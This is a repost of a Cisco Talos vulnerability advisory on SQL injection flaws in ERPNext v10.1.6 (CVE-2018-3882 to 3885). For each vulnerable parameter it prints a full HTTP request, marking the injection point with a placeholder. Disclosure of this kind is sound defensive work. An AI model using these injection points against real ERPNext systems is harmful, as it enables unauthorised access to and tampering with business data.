Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2018-3882: TALOS-2018-0560 || Cisco Talos Intelligence Group

An exploitable SQL injection vulnerability exists in the authenticated part of ERPNext v10.1.6. Specially crafted web requests can cause SQL injections resulting in data compromise. The searchfield parameter can be used to perform an SQL injection attack. An attacker can use a browser to trigger these vulnerabilities, and no special tools are required.

CVE
#sql#csrf#vulnerability#web#windows#cisco#js#java#intel#auth#firefox

Summary

Exploitable SQL injection vulnerabilities exists in the authenticated part of ERPNext v10.1.6. Specially crafted web requests can cause SQL injections resulting in data compromise. An attacker can use a browser to trigger these vulnerabilities, and no special tools are required.

Tested Versions

ERPNext v10.1.6 (master)

Product URLs

https://erpnext.com/

CVSSv3 Score

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

CWE

CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)

Details

The following parameters are vulnerable to SQL injection attacks:

CVE-2018-3882 - searchfield parameter

The searchfield parameter can be used to perform an SQL injection attack as shown below:

GET /?txt=a&searchfield=name<SQLINJECTION>&query=erpnext.controllers.queries.employee_query&doctype=Employee&cmd=frappe.desk.search.search_widget&_=1522110063950 HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Cookie: user_image=; user_id=Administrator; system_user=yes; full_name=Administrator; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=-cQWmng9Wch23ijkAAAF
DNT: 1
Connection: close

CVE-2018-3883 - employee parameter

The employee parameter can be used to perform an SQL injection attack as shown below:

POST / HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Content-Length: 194
Cookie: user_image=; user_id=Administrator; system_user=yes; full_name=Administrator; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=-cQWmng9Wch23ijkAAAF
DNT: 1
Connection: close

    employee=EMP%2f0001<SQLINJECTION>&date=2018-03-07&leave_type=Leave+Without+Pay&consider_all_leaves_in_the_allocation_period=true&cmd=erpnext.hr.doctype.leave_application.leave_application.get_leave_balance_on

CVE-2018-3883 - sort_order parameter

The sort_order parameter can be used to perform an SQL injection attack as shown below:

POST / HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Content-Length: 113
Cookie: user_image=; user_id=admin%40admin.com; system_user=yes; full_name=asd; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=ELCOCSQzSPt1L6_fAAAE
DNT: 1
Connection: close

    item_code=asdasd&start=0&sort_by=projected_qty&sort_order=asc<SQLINJECTION>&cmd=erpnext.stock.dashboard.item_dashboard.get_data

CVE-2018-3884 - sort_by parameter

The sort_by parameter can be used to perform an SQL injection attack as shown below:

POST / HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Content-Length: 113
Cookie: user_image=; user_id=admin%40admin.com; system_user=yes; full_name=asd; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=ELCOCSQzSPt1L6_fAAAE
DNT: 1
Connection: close

    item_code=asdasd&start=0&sort_by=projected_qty<SQLINJECTION>&sort_order=asc&cmd=erpnext.stock.dashboard.item_dashboard.get_data

CVE-2018-3884 - start parameter

The start parameter can be used to perform an SQL injection attack as shown below:

POST / HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Content-Length: 113
Cookie: user_image=; user_id=admin%40admin.com; system_user=yes; full_name=asd; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=ELCOCSQzSPt1L6_fAAAE
DNT: 1
Connection: close

    item_code=asdasd&start=0<SQLINJECTION>&sort_by=projected_qty&sort_order=asc&cmd=erpnext.stock.dashboard.item_dashboard.get_data

CVE-2018-3885 - order_by parameter

The order_by parameter can be used to perform an SQL injection attack as shown below:

GET /?start=0&page_length=20&doctype=Customer&fields=[%22%60tabCustomer%60.%60name%60%22%2c%22%60tabCustomer%60.%60owner%60%22%2c%22%60tabCustomer%60.%60docstatus%60%22%2c%22%60tabCustomer%60.%60_user_tags%60%22%2c%22%60tabCustomer%60.%60_comments%60%22%2c%22%60tabCustomer%60.%60modified%60%22%2c%22%60tabCustomer%60.%60modified_by%60%22%2c%22%60tabCustomer%60.%60_assign%60%22%2c%22%60tabCustomer%60.%60_liked_by%60%22%2c%22%60tabCustomer%60.%60_seen%60%22%2c%22%60tabCustomer%60.%60customer_name%60%22%2c%22%60tabCustomer%60.%60image%60%22%2c%22%60tabCustomer%60.%60disabled%60%22%2c%22%60tabCustomer%60.%60customer_group%60%22%2c%22%60tabCustomer%60.%60territory%60%22%2c%22%60tabCustomer%60.%60customer_type%60%22]&filters=%5B%5D&order_by=<SQLINJECTION>&with_comment_count=true&user_settings=%7B%22updated_on%22%3A%22Tue+Mar+27+2018+01%3A08%3A06+GMT%2B0100%22%2C%22List%22%3A%7B%22filters%22%3A%5B%5D%2C%22order_by%22%3A%22%60tabCustomer%60.%60modified%60+desc%22%7D%2C%22last_view%22%3A%22List%22%7D&cmd=frappe.desk.reportview.get&_=1522108874124 HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Cookie: user_image=; user_id=admin%40admin.com; system_user=yes; full_name=asd; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=ELCOCSQzSPt1L6_fAAAE
DNT: 1
Connection: close

Timeline

2018-04-12 - Vendor Disclosure
2018-09-05 - Public Release

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907